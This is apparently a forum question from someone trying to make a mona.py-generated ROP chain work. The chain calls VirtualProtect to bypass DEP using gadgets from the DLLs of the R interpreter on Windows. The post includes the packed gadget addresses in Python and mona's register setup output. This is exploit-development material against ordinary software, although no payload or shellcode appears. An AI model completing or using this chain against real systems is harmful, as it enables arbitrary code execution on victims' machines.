I am dealing with ROP chains from mona, but at the moment I want to execute it. This fails without any apparent reason, but I want to know how I can fix it. I am struggling at the moment with creating / fixing my ROP chain.
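def create_rop_chain():
    """Serialize the mona.py-generated gadget list into a byte string.

    Every entry is packed as a 32-bit little-endian unsigned integer
    (``struct.pack('<I', ...)``), so the result is ``4 * len(rop_gadgets)``
    bytes long (88 bytes for the list below) and is returned as ``bytes``.

    Fix versus the original: on Python 3 ``struct.pack`` returns ``bytes``,
    and ``''.join`` over bytes objects raises
    ``TypeError: sequence item 0: expected str instance, bytes found`` --
    which is one plausible reading of "fails without reason" if the script
    is run under Python 3.  Joining with ``b''`` returns the bytes the
    caller presumably expects; on Python 2 ``b''`` is just ``''``, so the
    change is backward-compatible.

    Returns:
        bytes: the packed gadget list, 88 bytes.

    Raises:
        struct.error: if an entry is outside 0..0xFFFFFFFF (a mistyped
            address would be caught here rather than silently truncated).
    """
    # Function-scope import so the block is self-contained; the file's
    # import section is not visible in this excerpt.
    import struct

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x6c998dce,  # POP EAX # RETN [R.dll]
        0x643cb170,  # ptr to &VirtualProtect() [IAT Riconv.dll]
        0x6cb95ca5,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [R.dll]
        0x6ca5755d,  # XCHG EAX,ESI # RETN [R.dll]
        0x6fef9d29,  # POP EBP # RETN [grDevices.dll]
        0x6ca599c7,  # & jmp esp [R.dll]
        0x6cbebfa6,  # POP EAX # RETN [R.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x6c0e1c4a,  # NEG EAX # RETN [Rlapack.dll]
        0x63742597,  # XCHG EAX,EBX # RETN [Rgraphapp.dll]
        0x6e7d4eb8,  # POP ECX # RETN [utils.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x71364d80,  # NEG ECX # RETN [stats.dll]
        0x6ca29048,  # MOV EDX,ECX # POP ESI # RETN [R.dll]
        0x41414141,  # Filler (compensate)
        0x64c45cb8,  # POP ECX # RETN [methods.dll]
        0x713bb594,  # &Writable location [stats.dll]
        0x6c9803dc,  # POP EDI # RETN [R.dll]
        0x6375fe5c,  # RETN (ROP NOP) [Rgraphapp.dll]
        0x6c998dce,  # POP EAX # RETN [R.dll]
        0x90909090,  # nop
        0x6feb834a,  # PUSHAD # RETN [grDevices.dll]
    ]
    # b''.join: struct.pack yields bytes, and a str-joiner cannot join them
    # on Python 3.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)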
rop_chain = create_rop_chain()  # packed gadget list, built once when this module/script is loaded
mona also gives me this:
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------